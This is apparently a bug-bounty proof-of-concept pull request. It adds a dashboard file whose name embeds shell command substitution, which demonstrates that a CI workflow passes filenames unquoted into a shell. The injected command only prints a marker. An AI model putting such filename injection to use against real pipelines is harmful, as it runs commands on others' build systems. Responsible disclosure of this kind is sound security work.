### PR TITLE
VRP PoC: shell command substitution in changed dashboard filenames (DO NOT MERGE)

### DIFF
--- a/dashboards/$(echo DASH_PWNED_20260805 >&2).json
+++ b/dashboards/$(echo DASH_PWNED_20260805 >&2).json
@@ -1,0 +1,1 @@
+{"displayName":"VRP"}


### PR DESCRIPTION
Controlled OSS VRP PoC. validate_dashboards_format.yml passes changed-files output unquoted into a shell command. The added filename uses command substitution and only prints a marker to stderr. Please do not merge; the PR will be closed after evidence.